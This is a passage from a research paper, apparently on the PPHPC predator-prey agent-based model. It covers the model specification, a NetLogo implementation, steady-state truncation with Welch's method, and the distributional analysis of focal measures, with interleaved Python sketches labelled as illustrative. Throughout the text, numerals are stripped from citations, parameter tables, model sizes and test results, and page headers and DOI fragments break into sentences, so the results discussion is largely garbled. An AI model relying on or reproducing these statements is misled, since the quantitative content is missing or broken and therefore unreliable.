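        y: int           # Y: vertical grid position, 0 .. y_env - 1

    @dataclass
    class Cell:
        countdown: int   # C: cell-bound food is available when countdown == 0

    @dataclass
    class Environment:
        x_env: int       # horizontal size of the toroidal grid
        y_env: int       # vertical size of the toroidal grid
        c_r: int         # restart value for the cell countdown after food is eaten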
process overview and scheduling

the algorithm below describes the simulation schedule and its associated processes. execution starts with an initialization process, init(), where a predetermined number of agents are randomly placed in the simulation environment. cell-bound food is also initialized at this stage. after initialization, and to get the simulation state at iteration zero, outputs are gathered by the getstats() process. the scheduler then enters the main simulation loop, where each iteration is sub-divided into four steps: (1) agent movement; (2) food growth in grid cells; (3) agent actions; and, (4) gathering of simulation outputs. state variables are asynchronously updated, i.e. they are assigned a new value as soon as this value is calculated by a process (e.g., when an agent gains energy by feeding).

algorithm: main simulation algorithm. for loops can be processed in any order or in random order. in terms of expected dynamic behavior, the former means the order is not relevant, while the latter specifies loop iterations should be explicitly shuffled.

     1: init()
     2: getStats()
     3: i <- 1
     4: for i <= m do
     5:     for each agent do            ▷ any order
     6:         move()
     7:     end for
     8:     for each grid cell do        ▷ any order
     9:         growFood()
    10:     end for
    11:     for each agent do            ▷ random order
    12:         act()
    13:     end for
    14:     getStats()
    15:     i <- i + 1
    16: end for

design concepts

basic principles. the general concepts of this model are based on well-studied predator-prey dynamics, initially through analytical approaches (lotka, ; volterra, ), and later using agent-based models (smith, ). however, pphpc is designed so that it can be correctly implemented using diverse computational approaches. realizations of this model can provide valuable information on how to better implement sabms on different computing architectures, namely parallel ones. in particular, they may show the impact of different parallelization strategies on simulation performance.

emergence. the model is characterized by oscillations in the population of both prey and predator, as well as in the available quantity of cell-bound food. typically, a peak of predator population occurs slightly after a peak in prey population size, while the quantity of cell-bound food is approximately in "phase opposition" with the prey's population size.

sensing. agents can sense the presence of food in the grid cell in which they are currently located. this means different things for prey and predators. prey agents can read the local grid cell C state variable, which, if zero, means there is food available. predator agents can determine the presence of prey agents.

interaction. agents interact with sources of food present in the grid cell they are located in.

stochasticity. the following processes are random: (a) initialization of specific state variables; (b) agent movement; (c) the order in which agents act; and, (d) agent reproduction.

observation. the following vector is collected in the getstats() process, where i refers to the current iteration:

    O_i = (P^s_i, P^w_i, P^c_i, Ē^s_i, Ē^w_i, C̄_i)

P^s_i and P^w_i refer to the total prey and predator population counts, respectively, while P^c_i holds the quantity of available cell-bound food. Ē^s_i and Ē^w_i contain the mean energy of the prey and predator populations. finally, C̄_i refers to the mean value of the C state variable over all grid cells.
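the following is a minimal, illustrative python sketch of the scheduling logic and of the observation vector O_i described above. it is not the authors' implementation: the submodels (move, grow_food, act) are caller-supplied functions, and agent removal is simplified (dead agents are filtered at the end of each iteration rather than removed immediately):

    import random

    class Agent:
        def __init__(self, kind, energy, x, y):
            self.kind, self.energy, self.x, self.y = kind, energy, x, y

    class Cell:
        def __init__(self, countdown):
            self.countdown = countdown

    def get_stats(agents, cells):
        # observation vector O_i: population counts, available food, mean energies, mean countdown
        prey = [a.energy for a in agents if a.kind == "s"]
        pred = [a.energy for a in agents if a.kind == "w"]
        mean = lambda v: sum(v) / len(v) if v else 0
        return (len(prey), len(pred),
                sum(1 for c in cells if c.countdown == 0),
                mean(prey), mean(pred),
                mean([c.countdown for c in cells]))

    def run(agents, cells, m, move, grow_food, act, rng=random.Random(1)):
        stats = [get_stats(agents, cells)]          # simulation state at iteration zero
        for _ in range(m):
            for a in list(agents):                  # step 1: movement, any order
                move(a, rng)
            for c in cells:                         # step 2: food growth, any order
                grow_food(c)
            rng.shuffle(agents)                     # step 3: actions, explicitly random order
            for a in list(agents):
                if a.energy > 0:                    # agents with no energy no longer act
                    act(a, rng)
            agents[:] = [a for a in agents if a.energy > 0]
            stats.append(get_stats(agents, cells))  # step 4: gather outputs
        return stats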
initialization

the initialization process begins by instantiating the environment entity, a toroidal square grid, and filling it with x_env × y_env grid cells. the initial value of the countdown state variable in each grid cell, C_0, is set according to eq. (1):

    C_0 = U(1, c_r) if c = 0,  or  C_0 = 0 if c = 1,  with c = U(0, 1).    (1)

in other words, cell-bound food is initially available with 50% probability. if not available, the countdown state variable is set to a random value between 1 and c_r. the initial value of the state variables for each agent is determined according to eqs. (2) and (3):

    E_0 = U(1, 2g), with g ∈ {g^s, g^w}    (2)

    (X_0, Y_0) = (U(0, x_env − 1), U(0, y_env − 1)).    (3)

submodels

as stated in 'process overview and scheduling', each iteration of the main simulation loop is sub-divided into four steps, described in the following paragraphs.

move(). in step 1, agents move(), in any order, within a von neumann neighborhood, i.e. up, down, left, right or stay in the same cell, with equal probability. agents lose l^s or l^w units of energy when they move, even if they stay in the same cell; if energy reaches zero, the agent dies and is removed from the simulation.

growfood(). in step 2, during the growfood() process, each grid cell checks if C = 0 (meaning there is food available). if C > 0 it is decremented by one unit. equation (4) summarizes this process:

    C_i = max(C_{i−1} − 1, 0).    (4)

act(). in step 3, agents act() in explicitly random order, i.e. the agent list should be shuffled before the agents have a chance to act. the act() process is composed of two sub-actions: tryeat() and tryreproduce(). the act() process is atomic, i.e. once called, both tryeat() and tryreproduce() must be performed; this implies that prey agents may be killed by predators before or after they have a chance of calling act(), but not during the call.

tryeat(). agents can only interact with sources of food present in the grid cell they are located in. predator agents can kill and consume prey agents, removing them from the simulation. prey agents can consume cell-bound food, resetting the local grid cell C state variable to c_r. a predator can consume one prey per iteration, and a prey can only be consumed by one predator. agents who act first claim the food resources available in the local grid cell. feeding is automatic: if the resource is there and no other agent has yet claimed it, the agent will consume it. moreover, only one prey can consume the local cell-bound food if available (i.e. if C = 0). when an agent successfully feeds, its energy E is incremented by g^s or g^w, depending on whether the agent is a prey or a predator, respectively.

tryreproduce(). if the agent's energy, E, is above its species reproduction threshold, r^s_T or r^w_T, then reproduction will occur with probability given by the species reproduction probability, r^s_P or r^w_P, as shown in the algorithm below. when an agent successfully reproduces, its energy is divided (using integer division) with its offspring. the offspring is placed in the same grid cell as its parent, but can only take part in the simulation in the next iteration. more specifically, newly born agents cannot act(), nor be acted upon. the latter implies that newly born prey cannot be consumed by predators in the current iteration. agents immediately update their energy if they successfully feed and/or reproduce.

algorithm: agent reproduction.

    function tryReproduce()
        if E > r_T then
            if U(1, 100) < r_P then
                E_child <- E / 2              ▷ integer division
                E <- E − E_child
                newAgent(t, E_child, X, Y)
            end if
        end if
    end function
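as an illustration only, the submodels described above can be sketched in python roughly as follows. this is not the paper's netlogo code; grid bookkeeping and predator feeding on prey are omitted for brevity, names are our own, and the percentage-based reproduction draw follows the reproduction algorithm as reconstructed above:

    import random
    from dataclasses import dataclass

    @dataclass
    class Agent:
        kind: str      # "s" (prey) or "w" (predator)
        energy: int
        x: int
        y: int

    @dataclass
    class Cell:
        countdown: int # C; food is available when countdown == 0
        restart: int   # c_r

    def move(agent, x_env, y_env, loss, rng):
        # von neumann move: up, down, left, right or stay, with equal probability
        dx, dy = rng.choice([(0, 0), (0, 1), (0, -1), (1, 0), (-1, 0)])
        agent.x = (agent.x + dx) % x_env       # toroidal wrap-around
        agent.y = (agent.y + dy) % y_env
        agent.energy -= loss                   # energy is lost even when staying put

    def grow_food(cell):
        # eq. (4): C_i = max(C_{i-1} - 1, 0)
        cell.countdown = max(cell.countdown - 1, 0)

    def prey_try_eat(prey, cell, gain):
        # a prey consumes the local cell-bound food if available, resetting the countdown
        if cell.countdown == 0:
            cell.countdown = cell.restart
            prey.energy += gain

    def try_reproduce(agent, newborns, r_t, r_p, rng):
        # reproduce with probability r_p (a percentage) if energy exceeds threshold r_t;
        # energy is split with the offspring using integer division, and the offspring
        # only joins the simulation in the next iteration (hence the newborns list)
        if agent.energy > r_t and rng.randint(1, 100) < r_p:
            child_energy = agent.energy // 2
            agent.energy -= child_energy
            newborns.append(Agent(agent.kind, child_energy, agent.x, agent.y))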
parameterization

model parameters can be qualitatively separated into size-related and dynamics-related parameters, as shown in the following table. although size-related parameters also influence model dynamics, this separation is useful for parameterizing simulations.

table: size-related and dynamics-related model parameters.

type        parameter                   symbol
size        environment size            x_env, y_env
size        initial agent count         P^s_0, P^w_0
size        number of iterations        m
dynamics    energy gain from food       g^s, g^w
dynamics    energy loss per turn        l^s, l^w
dynamics    reproduction threshold      r^s_T, r^w_T
dynamics    reproduction probability    r^s_P, r^w_P
dynamics    cell food restart           c_r

concerning size-related parameters, more specifically the grid size, we propose a base grid size associated with fixed initial prey and predator counts. different grid sizes should have proportionally assigned agent population sizes, as given in a table of initial model sizes listing, for each size, the grid dimensions (x_env × y_env) and the initial populations (P^s_0, P^w_0). in other words, there are no changes in the agent density nor in the ratio between prey and predators.

for the dynamics-related parameters, we propose two sets of parameters which generate two distinct dynamics; each set specifies the prey and predator energy gain from food (g^s, g^w), energy loss per turn (l^s, l^w), reproduction thresholds (r^s_T, r^w_T), reproduction probabilities (r^s_P, r^w_P) and the cell food restart value (c_r). the second parameter set typically yields more than twice as many agents as the first parameter set. matching results with runs based on distinct parameters is necessary in order to have a high degree of confidence in the similarity of different implementations (edmonds & hales, ). while many more combinations of parameters can be experimented with this model, these two sets are the basis for testing and comparing pphpc implementations. we will refer to a combination of model size and parameter set as "size@set". while simulations of the pphpc model are essentially non-terminating (a non-terminating simulation is one for which there is no natural event to specify the length of a run (law, )), the number of iterations, m, is set to a fixed value which allows the analysis of steady-state behavior for all the parameter combinations discussed here.

a netlogo implementation

netlogo is a well-documented programming language and modeling environment for abms, focused on both research and education. it is written in scala and java and runs on the java virtual machine (jvm). it uses a hybrid interpreter and compiler that partially compiles abm code to jvm bytecode (sondahl, tisue & wilensky, ). it comes with powerful built-in procedures and is relatively easy to learn, making abms more accessible to researchers without programming experience (martin et al., ).
advantages of having a netlogo version include real-time visualization of the simulation, pseudo-code-like model descriptions, simplicity in changing and testing different model aspects and parameters, and command-line access for batch runs and cycling through different parameter sets, even allowing for multithreaded simultaneous execution of multiple runs. a netlogo reference implementation is also particularly important as a point of comparison with other abm platforms (isaac, ).

the netlogo implementation of pphpc (shown in the figure below) is based on netlogo's own wolf sheep predation model (wilensky, ), considerably modified to follow the odd discussed in the previous section. most netlogo models will have at least a setup procedure, to set up the initial state of the simulation, and a go procedure to make the model run continuously (wilensky, ). the init() and getstats() processes (lines 1 and 2 of the main simulation algorithm) are defined in the setup procedure, while the main simulation loop is implemented in the go procedure. the latter has an almost one-to-one relation with its pseudo-code counterpart in the algorithm. by default, netlogo shuffles agents before issuing them orders, which fits naturally into the model odd. the implementation is available at https://github.com/fakenmc/pphpc/tree/netlogo.

figure: netlogo implementation of the pphpc model.
selection of focal measures

in order to analyze the output of a simulation model from a statistical point of view, we should first select a set of focal measures (fms) which summarize each output. wilensky & rand ( ) use this approach in the context of statistical comparison of replicated models. typically, fms consist of long-term or steady-state means. however, limiting the analysis to average system behavior can lead to incorrect conclusions (law, ). consequently, other measures such as proportions or extreme values can be used to assess model behavior. in any case, the selection of fms is an empirical exercise and is always dependent on the model under study. a few initial runs are usually required in order to perform this selection.

for the pphpc model, the typical output of a simulation run is shown in the figure below for both parameter sets. in both cases, all outputs undergo a transient stage and tend to stabilize after a certain number of iterations, entering steady-state. for other sizes, the situation is similar apart from a vertical scaling factor. outputs display pronounced extreme values in the transient stage, while circling around a long-term mean with an approximately constant standard deviation in the steady-state phase. this standard deviation is an important feature of the outputs, as it marks the overall variability of the predator-prey cycles. with this under consideration, six statistics, described in the table below, were selected for each output. considering there are six outputs, a total of 36 fms are analyzed for the pphpc model.

figure: typical model output for one model size, with panels (a) population, param. set 1; (b) energy, param. set 1; (c) population, param. set 2; (d) energy, param. set 2. other model sizes have outputs which are similar, apart from a vertical scaling factor. P_i refers to total population, Ē_i to mean energy and C̄_i to the mean value of the countdown state variable, C. superscript s relates to prey, w to predators, and c to cell-bound food. P^c_i and C̄_i are scaled for presentation purposes.

table: statistical summaries for each output X. X_i is the value of X at iteration i, m denotes the last iteration, and l corresponds to the iteration separating the transient and steady-state stages.

statistic                                                    description
max X_i, 0 <= i <= m                                         maximum value
arg max X_i, 0 <= i <= m                                     iteration where the maximum value occurs
min X_i, 0 <= i <= m                                         minimum value
arg min X_i, 0 <= i <= m                                     iteration where the minimum value occurs
X̄^ss = Σ_{i=l+1..m} X_i / (m − l)                            steady-state mean
S^ss = sqrt( Σ_{i=l+1..m} (X_i − X̄^ss)² / (m − l − 1) )      steady-state sample standard deviation

table: values of a generic simulation output (under 'iterations') for n replications of m iterations each (plus iteration 0, i.e. the initial state), and the respective fms (under 'focal measures'). values along columns are iid.

rep.   iterations                                        focal measures
1      X_{1,0}  X_{1,1}  ...  X_{1,m−1}  X_{1,m}         max X_1   arg max X_1   min X_1   arg min X_1   X̄^ss_1   S^ss_1
2      X_{2,0}  X_{2,1}  ...  X_{2,m−1}  X_{2,m}         max X_2   arg max X_2   min X_2   arg min X_2   X̄^ss_2   S^ss_2
...    ...      ...      ...  ...        ...             ...       ...           ...       ...           ...      ...
n      X_{n,0}  X_{n,1}  ...  X_{n,m−1}  X_{n,m}         max X_n   arg max X_n   min X_n   arg min X_n   X̄^ss_n   S^ss_n
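as a small illustration, the six statistical summaries described above can be computed for a single output vector with a few lines of python (numpy is assumed; the function and key names are our own):

    import numpy as np

    def focal_measures(x, l):
        # x = [x_0, ..., x_m] is one output of one replication;
        # l is the truncation point separating transient and steady-state stages
        x = np.asarray(x, dtype=float)
        steady = x[l + 1:]                      # x_{l+1}, ..., x_m
        return {
            "max": x.max(),
            "argmax": int(x.argmax()),          # iteration where the maximum occurs
            "min": x.min(),
            "argmin": int(x.argmin()),
            "ss_mean": steady.mean(),           # steady-state mean
            "ss_std": steady.std(ddof=1),       # sample std. dev. with (m - l - 1) divisor
        }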
collecting and preparing data for statistical analysis

let X_{j0}, X_{j1}, X_{j2}, ..., X_{jm} be an output from the j-th simulation run (rows under 'iterations' in the table above). the X_{ji}'s are random variables that will, in general, be neither independent nor identically distributed (law, ), and as such, are not adequate to be used directly in many formulas from classical statistics (which are discussed in the next section). on the other hand, let X_{1i}, X_{2i}, ..., X_{ni} be the observations of an output at iteration i for n runs (columns under 'iterations' in the table above), where each run begins with the same initial conditions but uses a different stream of random numbers as a source of stochasticity. the X_{ji}'s will now be independent and identically distributed (iid) random variables, to which classical statistical analysis can be applied. however, individual values of the output X at some iteration i are not representative of X as a whole. thus, we use the selected fms as representative summaries of an output, as shown in the table above, under 'focal measures.' taken column-wise, the observations of the fms are iid (because they are obtained from iid replications), constituting a sample amenable to statistical analysis.

regarding the steady-state measures, X̄^ss and S^ss, care must be taken with initialization bias, which may cause substantial overestimation or underestimation of the long-term performance (sanchez, ). such problems can be avoided by discarding data obtained during the initial transient period, before the system reaches steady-state conditions. the simplest way of achieving this is to use a fixed truncation point, l, for all runs with the same initial conditions, selected such that: (a) it systematically occurs after the transient state; and, (b) it is associated with a round and clear value, which is easier to communicate (sanchez, ). law ( ) suggests the use of welch's procedure (welch, ) in order to empirically determine l. let X̄_1, X̄_2, X̄_3, ..., X̄_m be the averaged process taken column-wise from the table above (columns under 'iterations'), such that X̄_i = Σ_{j=1..n} X_{ji} / n for i = 1, 2, ..., m. the averaged process has the same transient mean curve as the original process, but its variance is reduced by a factor of n. a low-pass filter can be used to remove short-term fluctuations, leaving the long-term trend of interest, allowing us to visually determine a value of l for which the averaged process seems to have converged. a moving average approach can be used for filtering:

    X̄_i(w) = Σ_{s=−w..w} X̄_{i+s} / (2w + 1),            if i = w+1, ..., m−w
    X̄_i(w) = Σ_{s=−(i−1)..(i−1)} X̄_{i+s} / (2i − 1),     if i = 1, ..., w                    (5)

where w, the window, is a positive integer such that w ≤ ⌊m/4⌋. this value should be large enough such that the plot of X̄_i(w) is moderately smooth, but not any larger. a more in-depth discussion of this procedure is available in welch ( ) and law ( ).
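a minimal python sketch of this filtering step (our own illustrative code, not the authors'): it averages one output across replications and applies the moving average of eq. (5), so that the truncation point l can be picked by inspecting the plot of the result:

    import numpy as np

    def welch_moving_average(runs, w):
        # runs: (n, m) array holding one output for n replications over iterations 1..m
        runs = np.asarray(runs, dtype=float)
        avg = runs.mean(axis=0)            # averaged process, variance reduced by a factor of n
        m = avg.size
        out = np.empty(m - w)
        for idx in range(m - w):           # idx = i - 1 for iterations i = 1, ..., m - w
            half = min(w, idx)             # shrinking window for the first w iterations
            out[idx] = avg[idx - half: idx + half + 1].mean()
        return out                         # plot this and choose l where it flattens out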
statistical analysis of focal measures

let Y_1, Y_2, ..., Y_n be iid observations of some fm with finite population mean μ and finite population variance σ² (i.e. any column under 'focal measures' in the table above). then, as described by law ( ) and law ( ), unbiased point estimators for μ and σ² are given by

    Ȳ(n) = Σ_{j=1..n} Y_j / n    (6)

and

    S²(n) = Σ_{j=1..n} [Y_j − Ȳ(n)]² / (n − 1)    (7)

respectively. another common statistic usually determined for a given fm is the confidence interval (ci) for Ȳ(n), which can be defined in several different ways. the t-distribution ci is commonly used for this purpose (law, ; law, ), although it has best coverage for normally distributed samples, which is often not the case for simulation models in general (sargent, ; law, ) and agent-based models in particular (helbing & balietti, ). if samples are drawn from populations with multimodal, discrete or strongly skewed distributions, the usefulness of t-distribution cis is further reduced. while there is not much to do in the case of multimodal distributions, law ( ) proposes the use of the ci developed by willink ( ), which takes distribution skewness into account. furthermore, cis for discrete distributions are less studied and usually assume the data follows a binomial distribution, presenting some issues of their own (brown, cai & dasgupta, ).

as suggested by radax & rengs ( ), we focus on providing a detailed assessment of the distributional properties of the different fms, namely whether they are sufficiently "normal" such that normality-assuming (parametric) statistical techniques can be applied, not only for ci estimation, but also for model comparison purposes. the normality of a data set can be assessed graphically or numerically (park, ). the former approach is intuitive, lending itself to empirical interpretation by providing a way to visualize how random variables are distributed. the latter approach is a more objective and quantitative form of assessing normality, providing summary statistics and/or statistical tests of normality. in both approaches, specific methods can be either descriptive or theory-driven, as shown in the following table. for this study we chose one method of each type (marked with an asterisk in the table). this approach not only provides a broad overview of the distribution under study, but is also important because no single method can provide a complete picture of the distribution.

table: methods for assessing the normality of a data set, adapted from park ( ). methods marked with * are used in this study.

                 graphical methods                   numerical methods
descriptive      histogram*, box plot, dot plot      skewness*, kurtosis
theory-driven    q–q plot*, p–p plot                 shapiro-wilk*, anderson-darling, cramer-von mises, kolmogorov-smirnov, jarque-bera and other tests

under the graphical methods umbrella, a histogram shows the approximate distribution of a data set, and is built by dividing the range of values into a sequence of intervals (bins), and counting how many values fall in each interval. a q–q plot compares the distribution of a data set with a specific theoretical distribution (e.g., the normal distribution) by plotting their quantiles against each other (thus "q–q"). if the two distributions match, the points on the plot will approximately lie on the y = x line. while a histogram gives an approximate idea of the overall distribution, the q–q plot is more adequate for seeing how well a theoretical distribution fits the data set.

concerning numerical methods, skewness measures the degree of symmetry of a probability distribution about its mean, and is a commonly used metric in the analysis of simulation output data (sargent, ; nakayama, ; law, ). if skewness is positive, the distribution is skewed to the right, and if negative, the distribution is skewed to the left. symmetric distributions have zero skewness; however, the converse is not necessarily true, e.g., skewness will also be zero if both tails of an asymmetric distribution account for half the total area underneath the probability density function. in the case of theory-driven numerical approaches, we select the shapiro-wilk (sw) test (shapiro & wilk, ), as it has been shown to be more effective when compared to several other normality tests (razali & wah, ). we focus on the p-value of this test (instead of the test's own w statistic), as it is an easily interpretable measure. the null hypothesis of this test is that the data set, or sample, was obtained from a normally distributed population. if the p-value is greater than a predetermined significance level α, usually 0.05 or 0.01, then the null hypothesis cannot be rejected. conversely, a p-value less than α implies the rejection of the null hypothesis, i.e., that the sample was not obtained from a normally distributed population.
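the four chosen assessments can be reproduced for any fm sample with standard scientific python tooling, as in the illustrative sketch below; the cap of 10 bins is our own placeholder for the cap discussed in 'results', and the function and key names are our own:

    import numpy as np
    from scipy import stats
    import matplotlib.pyplot as plt

    def assess_normality(sample, name="fm"):
        # histogram, q-q plot against a normal distribution, skewness and shapiro-wilk p-value
        sample = np.asarray(sample, dtype=float)
        skewness = stats.skew(sample)
        _, shapiro_p = stats.shapiro(sample)

        fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(8, 3))
        bins = min(10, np.unique(sample).size)          # cap bins by the number of unique values
        ax1.hist(sample, bins=bins)
        ax1.set_title(name + " histogram")
        stats.probplot(sample, dist="norm", plot=ax2)   # q-q plot vs. theoretical normal
        ax2.set_title(name + " q-q plot")
        fig.tight_layout()

        return {"skewness": skewness, "shapiro_p": shapiro_p}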
results

a total of n replications, r = 1, ..., n, were performed with netlogo for each combination of model sizes and parameter sets. each replication r was performed with a prng seed obtained by taking the md5 checksum of r and converting the resulting hexadecimal string to an integer of the maximum precision accepted by netlogo, guaranteeing some independence between seeds, and consequently, between replications. the list of seeds is provided in a supplemental table.

determining the steady-state truncation point

using welch's method, we smoothed the averaged outputs with a moving average filter. having experimented with several window values, the chosen w seemed to be a good compromise between rough and overly smooth plots. the figure below shows results for one model size and both parameter sets.
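the seed scheme described above can be sketched as follows in python; the 32-bit truncation and the replication count are assumptions made purely for illustration, since the exact values are not stated here:

    import hashlib

    def replication_seed(r, bits=32):
        # md5 checksum of the replication number, converted from hexadecimal to an
        # integer and truncated to a fixed width (assumed here to be 32 bits)
        digest = hashlib.md5(str(r).encode("utf-8")).hexdigest()
        return int(digest, 16) % (2 ** bits)

    n = 30                                              # illustrative replication count
    seeds = [replication_seed(r) for r in range(1, n + 1)]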
/peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. table histograms for the several size@set combinations of the arg maxpsi fm. set size , however, fms taken from arg max and arg min operators only yield integer (discrete) values, which correspond to specific iterations. the same is true for max and min of population outputs, namely psi , p w i , and p c i . this can be problematic for statistic summaries taken from integer-valued fms with a small number of unique values. for example, the sw test will not be very informative in such cases, and cannot even be performed if all observations yield the same value (e.g., arg max of pci for @ , table s . ). nonetheless, distributional properties of a fm can dramatically change for different model size and parameter set combinations. for example, for parameter set , observations of the arg max of pci span many different values for model size (table s . ), while for size , (table s . ) they are limited to only three different values. summary statistics appropriate for continuous distributions could be used in the former case, but do not provide overly useful information in the latter. in order to maintain a consistent approach, our discussion will continue mainly from a continuous distribution perspective, more specifically by analyzing how closely a given fm follows the normal distribution, though we superficially examine its discrete nature when relevant. distribution of focal measures over the several size@set combinations in the next paragraphs we describe the distributional behavior of each fm, and when useful, repeat in a compact fashion some of the information provided in tables s . –s . . maxpsi . the sw p-value is consistently above the % significance level, skewness is usually low and with an undefined trend, and the q–q plots mostly follow the y = x line. although there are borderline cases, such as @ and , @ , the summary statistics show that the maximum prey population fm generally follows an approximately normal distribution. arg maxpsi . this fm follows an approximately normal distribution for smaller sizes of parameter set , but as model size grows larger, the discrete nature of the data clearly stands out. this behavior is more pronounced for parameter set (which yields simulations inherently larger than parameter set ), such that, for , @ , all observations yield the same value (i.e., ). table shows, using histograms, how the distribution qualitatively evolves over the several size@set combinations. minpsi . two very different behaviors are observed for the two parameter sets. in the case of parameter set , this fm has a slightly negatively skewed distribution, with some p-values below the . significance threshold, but is otherwise not very far from normality fachada et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. table q–q plots for the several size@set combinations of the arg maxpwi fm. set size , (this is quite visible in some histograms). however, for parameter set , the data is more concentrated on a single value, more so for larger sizes. 
note that this single value is the initial number of prey, which means that, in most cases, the minimum number of prey never drops below its initial value. arg minpsi . this fm follows a similar pattern to the previous one, but more pronounced in terms of discreteness, namely for parameter set . for parameter set , sizes and , the distribution is bimodal, with the minimum prey population occurring at iteration zero (i.e. initial state) or around iteration , while for larger sizes, the minimum always occurs at iteration zero. psi ss . the prey population steady-state mean seems to generally follow a normal distribution, the only exception being @ , in which some departure from normality is observed, as denoted by a sw p-value below . and a few outliers in the q–q plot. sss(psi ). for most size@set combinations this fm does not present large departures from normality. however, skewness is always positive. maxpwi . this fm presents distributions which are either considerably skewed or relatively normal. the former tend to occur for smaller model sizes, while the latter for larger sizes, although this trend is not totally clear. the @ sample is a notable case, as it closely follows a normal distribution, with a symmetric histogram, approximately linear q–q plot, and a sw p-value of . . arg maxpwi . interestingly, for parameter set , this fm seems to follow a uniform distribution. this is more or less visible in the histograms, but also in the q–q plots, because when we plot uniform data points against a theoretical normal distribution in a q–q plot we get the “stretched-s” pattern which is visible in this case (table ). for parameter set , the distribution seems to be more normal, or even binomial as the discreteness of the data starts to stand-out for larger model sizes; the only exception is for size , which presents a multimodal distribution. minpwi . the minimum predator population seems to follow an approximately normal distribution, albeit with a slight positive skewness, except for @ , which has negative skewness. fachada et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. arg minpwi . this fm displays an approximately normal distribution. however, for larger simulations (i.e. mainly for parameter set ) the discrete nature of the data becomes more apparent. pwi ss . the steady-state mean of predator population apparently follows a normal distribution. this is confirmed by all summary statistics, such as the sw p-value, which is above . for all size@set combinations. sss(pwi ). departure from normality is not large in most cases ( @ and @ are exceptions, although the former due to a single outlier), but the trend of positive skewness is again observed for this statistic. maxpci . the maximum available cell-bound food seems to have a normal distribution, although @ has a few outliers which affect the result of the sw p-value (which, nonetheless, is above . ). arg maxpci . the behavior of this fm is again quite different between parameter sets. for the first parameter set, the discrete nature of the underlying distribution stands out, with no more than three unique values for size , down to a single value for larger sizes, always centered around the value (i.e. the maximum available cell-bound food tends to occur at iteration ). 
for the second parameter set, distribution is almost normal for sizes above , centered around iteration , although its discreteness shows for larger sizes, namely for size , , which only presents three distinct values. for size , most values fall in iteration , although two outliers push the mean up to . . minpci . this fm displays an apparently normal distribution for all model sizes and parameter sets, with the exception of @ , which has a few outliers at both tails of the distribution, bringing down the sw p-value barely above the % significance level. arg minpci . in this case, the trend is similar for both parameter sets, i.e. the distribution seems almost normal, but for larger sizes the underlying discreteness becomes apparent. this is quite clear for parameter set , as shown in table , where the sw test p-value decreases as the discreteness becomes more visible in the histograms and q–q plots. pci ss . for this fm there is not a significant departure from normality. the only exception is for @ , but only due to a single outlier. sss(pci ). like in previous cases, the steady-state sample standard deviation does not stray too far from normality, but consistently shows a positive skewness. maxe s i . for sizes and of both parameter sets, the maximum of the mean prey energy presents a positively skewed, lognormal-like distribution. for larger sizes, distributions tend to be more normal-like. this trend is clear when analyzing how the p-value of the sw test and the skewness vary for the several size@set combinations, as shown in table , namely for sizes and , where the former is smaller while the absolute value of the latter is larger. fachada et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. table three statistical summaries for the several sizes of the arg minpci fm for parameter set . row ‘sw’ contains the sw test p-values, while the corresponding histograms and q–q plots are in rows ‘hist.’ and ‘q–q’, respectively. set size , sw . . . . < . hist. q–q table p-values for the sw test (row ‘sw’) and skewness (row ‘skew.’) for the several size@set combinations of the maxe s i fm. set stat. size , sw . . . . . skew. . . . − . . sw < . . . . . skew. . . − . − . . arg maxe s i . for parameter set , the distribution is approximately normal for smaller sizes, with the underlying discreteness becoming apparent for larger sizes, centering around iteration . for parameter set , the data set revolves around a limited set of unique values (centered at iteration ), following a poisson-like distribution, except for size , which displays a bimodal behavior. mine s i . this fm seems to follow an approximately normal distribution. arg mine s i . in the case of parameter set , this fm has distributions with a single value: zero. this means that the minimum mean prey energy occurs at the initial state of the simulation. from there onwards, mean prey energy is always higher. the situation is notably different for the second parameter set, where minimum mean prey energy can occur at several different iterations centered around iteration . distribution seems to be binomial or poisson-like. e s i ss . although the histograms are not very clear, the q–q plots and the p-values from the sw test suggest that this fm follows a normal distribution. sss(e s i ). this fm does not seem to stray much from normality, except in the case of , @ and @ , which are affected by outliers. 
the tendency for the steady-state sample standard deviation statistic to show positive skewness is again confirmed with these observations ( @ being the exception). fachada et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. maxe w i . the maximum of mean predator energy follows an approximately normal distribution, though for @ there are a few replications which produce unexpected results. arg maxe w i . in most cases, this fm approximately follows a normal distribution. there are several exceptions though. for the second parameter set and sizes above , the fm starts to display its discrete behavior, following a poisson-like distribution. less critically, an outlier “ruins” normality for @ . mine w i . apart from a few outliers with some parameter combinations, this fm generally seems to follow a normal distribution. arg mine w i . perhaps with the exception of @ and @ , the iteration where the minimum of mean predator energy occurs seems best described with a discrete, poisson-like distribution. e w i ss . this fm generally follows a normal distribution. however, , @ shows a salient second peak (to the right of the histogram, also visible in the q–q plot), affecting the resulting sw p-value, which is below the % significance threshold. sss(e w i ). this fm follows a positively skewed unimodal distribution, in the same line as the steady-state sample standard deviation of other outputs. note the outlier in @ , also observed for the sss(pwi ) fm, which is to be excepted as both fms are related to predator dynamics. maxci. the samples representing the maximum of the mean c state variable are most likely drawn from a normal distribution. most histograms are fairly symmetric (which is corroborated by the low skewness values), the q–q plots are generally linear, and the sw p-value never drops below . significance. arg maxci. for smaller model sizes this fm follows a mostly normal distribution, but as with other iteration-based fms, the underlying discreteness of the distribution starts to show at larger model sizes, especially for the second parameter set. minci. for most size@set combinations, the minimum of the mean c state variable seems to be normally distributed. nonetheless, a number of observations for @ yield unexpected values, making the respective distribution bimodal and distorting its normality (though the respective sw p-value does not drop below . ). arg minci. as in some previous cases, this fm displays different behavior depending on the parameter set. for the first parameter set, practically all observations have the same value, , which means the minimum of the mean c state variable is obtained at iteration . only model sizes and have some observations representing iterations and/or . parameter set yields a different dynamic, with an average iteration of approximately (except for size , which has an average iteration of . due to a few very fachada et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. 